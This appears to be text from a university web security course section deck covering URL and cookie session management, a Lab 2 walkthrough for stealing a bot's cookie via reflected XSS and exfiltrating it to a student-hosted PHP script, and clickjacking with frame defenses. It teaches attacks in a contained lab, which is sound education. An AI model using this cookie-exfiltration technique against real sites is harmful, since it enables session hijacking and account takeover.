Section 6: Session Management, Lab 2, & Clickjacking CSE 484 / CSE M 584
Homework 2 Due @ 11:59pm Lab 2 Due @ 11:59pm May 8 May 22 Administrivia May 15 Final Project Checkpoint 1 Due
Web Session Management
Primitive Online Transaction www.e_buy.com/ shopping.cfm? www.e_buy.com uid=269& item1=102030405 View catalog Select item Check out www.e_buy.com/ www.e_buy.com/ checkout.cfm? shopping.cfm? uid=269& uid=269 item1=102030405 Store session information in URL; easily read on network 👏
ENCOD EN ODING Encoding State in URL ST STATE IN UR URL L IS IS A BA BAD ID IDEA • Unstable, frequently changing URLs • Vulnerable to eavesdropping and modification • There is no guarantee that URL is private
FatBrain.com circa 1999 • User logs into website with his password, authenticator is generated, user is given special URL containing the authenticator https://www.fatbrain.com/HelpAccount.asp?t=0&p1=me@me.com&p2=540555758 • With special URL, user doesn’t need to reauthenticate • Reasoning: user could not have known the special URL w/o authenticating first. That’s true, BUT… • Authenticators are global sequence numbers • It’s easy to guess sequence number for another user https://www.fatbrain.com/HelpAccount.asp?t=0&p1=SomeoneElse&p2=540555752 • Partial fix : use random authenticators
Storing State in Hidden Forms • Dansie Shopping Cart (2006) – “A premium, comprehensive, Perl shopping cart. Increase your web sales by making it easier for your web store customers to order.” <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl"> Black Leather purse with leather straps<BR>Price: $20.00<BR> Change this to 2.00 <INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse"> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00"> <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg"> Bargain shopping! <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps"> <INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart"> Fix: validate with data stored on server! </FORM>
Better Session Management: Web Authentication via Cookies
Review: Cookies • What are they? • Strings stored by your browser for a particular website • A web server tells your browser to store a cookie • Your browser sends back that cookie for each subsequent request to that web server (and only that web server) GET example.com 200 OK, set-cookie user=123 www.example.com Browser GET example.com/myprofile example.com: Cookie: user=123 user=123
Authentication 🔒 • Helps the web server identify who is making the request and whether they have logged in What are Personalization 👖 cookies • Can be used to store settings from used for? previous visits Tracking 🕶 • Follow the user from site to site; learn their browsing behavior
• When session starts, server computes Back to Web an authenticator and gives it back to browser in the form of a cookie Session • Authenticator must be un-forgeable and Management tamper-proof • Ex: MAC (server’s secret key, session id)
With each request, browser presents the cookie Back to Web Session Management Server recomputes and verifies the authenticator
Why are cookies targets for hackers? Can be used to login as the victim user!
Aside: Cookies & Same Origin Policy Which cookies can be set by login.site.com ? Disallowed Domains: Allowed Domains: ❌ othersite.com ✅ login.site.com ❌ user.site.com ✅ .site.com login.site.com can set cookies for all of .site.com (domain suffix), but not for another site or top-level domain (TLD) and not for a specific different subdomain on site.com.
Reflective XSS Review
Lab 2 Overview
Lab 2 Overview: Types of Attacks Cross Site Cross Site SQL Injection Scripting Request Forgery • 6 targets + 2 • 2 targets + 1 • 1 target extra credit extra credit
Lab 2: A bit of: Lots of What is HTML, JS, (less resources in involved? of) PHP, SQL spec
Pikachu, Meowth, and Cookies • Each target has a “safe” (a link) that requires an authenticated cookie to open • Meowth server accepts URLs to images • Valid URLs are visited by Meowth using a Firefox browser • Invalid URLs cause the server to return an error page
Pikachu, Meowth, and Cookies Goal: Steal Meowth’s server’s cookie Use this cookie to open the safe
Pikachu, Meowth, and Cookies • Invalid input is displayed on the page • How is this vulnerable? • What if we included HTML? • JavaScript? Input string: <ui><li>List item 1</li><li>List item 2</li></ui>
Goal: get the bot to visit an attacker-controlled URL with its cookie included 1 2 3 Lab 2 XSS Workflow Set up a PHP script Construct and Retrieve the cookie for receiving the send a cookie- from your server Steps cookie (a simple stealing URL to the and use it to server) bot access the safe
You have access to CSE web hosting! How do you Host a PHP script at homes.cs.washington.edu receive the Write a PHP script, store it on attu as: • /cse/web/homes/<netid>/cookieEater.php cookie? Browsers can call this script at • https://homes.cs.washington.edu/~<netid>/coo Step 1 kieEater.php
How do you When your XSS attack gets the bot to call this URL, pass the cookie as a URL parameter receive the Use JavaScript to steal document.cookie and • insert it into the URL cookie? . https://homes.cs.washington.edu/~<netid>/coo • Step 2 kieEater.php?cookie=secretCookieValue
How do you Extract the cookie from the URL. receive the In your script, write the cookie to a file, so you can ssh in and copy it. cookie? https://www.w3schools.com/php/php_file_create.asp Step 3 & 4
How do you get the bot to run your script? The bot won’t visit invalid URLs, so just passing it JavaScript won’t work However, invalid URLs will be displayed on error page Input your attack string to encode it, then take the URL of the error page and submit to the bot Bot will visit the error page with the displayed script!
Lab 2 Detailed XSS Workflow Copy URL Construct containing malicious script Bot visits link encoded script string string Script now Submit URL String is Submit string to pulls cookies containing displayed on from the bot. “send link” script instead Link is page accepted Server side Page complains is not a link String is displayed on Get cookie from page output, set cookie, and open safe At this point, if your cookie script works, you can pull your Adversary side own cookies
Viewing / Setting Cookies (Firefox) • Open inspector • Options à Web Developer à Storage Inspector • Add a cookie • Add item (+) à Set name and value
Viewing / Setting Cookies (Chrome) • Open inspector • On page, click anywhere à Inspect • Add a cookie • Application à Cookies à Double click new row à Add name and value
Final Notes on Lab 2 Subsequent targets will begin filtering input If you need help with lab setup, please come to office hours! Make sure to follow the chmod instructions in the spec
Clickjacking
Clickjacking (UI Redressing) • Attacker overlays multiple transparent or opaque frames to trick a user into clicking on a button or link on another page • Clicks meant for the visible page are hijacked and routed to another, invisible page
How does it work? www.attacker.site.com • Any site can embed any other site using Click here to see an iframe cute cats! <iframe iframe: src = http://www.google.com/...> venmo.com/wolfson/send </iframe> • Use CSS to make the iframe of the target Send $40 site invisible Submit • opacity defines visibility percentage • Use CSS to put the iframe’s button over the parent page’s button
Other Variants • Fake cursors (mouse pointers) • Stealing text box focus – redirecting typing elsewhere • Double clickjack: ask user to double click, pop a window up right below the mouse in between clicks
• Websites can prevent themselves from being used in an iframe, using the X-Frame-Options header Defenses • Websites can check if they are in an iframe, and who is embedding them, by looking at the Referer header
Recommend
More recommend
